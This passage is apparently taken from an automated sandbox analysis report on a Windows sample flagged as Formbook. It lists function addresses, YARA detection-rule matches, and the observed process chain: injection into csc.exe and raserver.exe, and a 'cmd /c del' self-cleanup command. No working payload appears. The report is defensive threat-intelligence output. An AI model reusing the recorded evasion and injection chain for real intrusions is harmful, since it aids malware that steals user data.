          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FB2DB05_2_04FB2DB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505EC605_2_0505EC60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05056C695_2_05056C69
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA0D695_2_04FA0D69
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05039C985_2_05039C98
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0506ACEB5_2_0506ACEB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F9AD005_2_04F9AD00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F92EE85_2_04F92EE8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA1EB25_2_04FA1EB2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505FF635_2_0505FF63
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FC0E505_2_04FC0E50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505EFBF5_2_0505EFBF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05051FC65_2_05051FC6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05040E6D5_2_05040E6D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05050EAD5_2_05050EAD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05059ED25_2_05059ED2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FACF005_2_04FACF00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA28C05_2_04FA28C0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FB68825_2_04FB6882
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA98705_2_04FA9870
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FBB8705_2_04FBB870
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F868685_2_04F86868
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505E9A65_2_0505E9A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA38005_2_04FA3800
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050408355_2_05040835
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F9E9A05_2_04F9E9A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505F8725_2_0505F872
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050198B25_2_050198B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050578F35_2_050578F3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505FB2E5_2_0505FB2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FBFAA05_2_04FBFAA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05014BC05_2_05014BC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505CA135_2_0505CA13
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505EA5B5_2_0505EA5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505FA895_2_0505FA89
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA0B105_2_04FA0B10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6EB715_2_00C6EB71
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C52D885_2_00C52D88
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C52D905_2_00C52D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6DE5F5_2_00C6DE5F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C59E605_2_00C59E60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C52FB05_2_00C52FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BA0365_2_052BA036
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B2D025_2_052B2D02
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BE5CD5_2_052BE5CD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B89125_2_052B8912
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B10825_2_052B1082
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B5B325_2_052B5B32
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B5B305_2_052B5B30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BB2325_2_052BB232
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: String function: 00007FF72F5AC1A0 appears 63 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0500E692 appears 84 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 00D20FD2 appears 117 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04FD5050 appears 35 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04FE7BE4 appears 83 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0501EF10 appears 99 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04F8B910 appears 251 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05CEEF10 appears 102 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05CB7BE4 appears 81 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05C5B910 appears 242 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05CDE692 appears 81 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05CA5050 appears 35 times
          Source: kHslwiV2w6.exeStatic PE information: invalid certificate
          Source: kHslwiV2w6.exeBinary or memory string: OriginalFilename vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exe, 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exe, 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: kHslwiV2w6.exeBinary or memory string: OriginalFilenameLeadingZeroCountAttribute.dllT vs kHslwiV2w6.exe
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: kHslwiV2w6.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: csc.exe PID: 1408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: kHslwiV2w6.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9950388536096256
          Source: classification engineClassification label: mal100.troj.evad.winEXE@385/0@23/5
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B1830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF72F5B1830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1A010 CoCreateInstance,5_2_00D1A010
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D152BB LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,5_2_00D152BB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:304:WilStaging_02
          Source: C:\Windows\SysWOW64\raserver.exeCommand line argument: offerraupdate5_2_00D19AC5
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: kHslwiV2w6.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeFile read: C:\Users\user\Desktop\kHslwiV2w6.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\kHslwiV2w6.exe "C:\Users\user\Desktop\kHslwiV2w6.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
          Source: kHslwiV2w6.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: kHslwiV2w6.exeStatic file information: File size 1627744 > 1048576
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: kHslwiV2w6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: kHslwiV2w6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
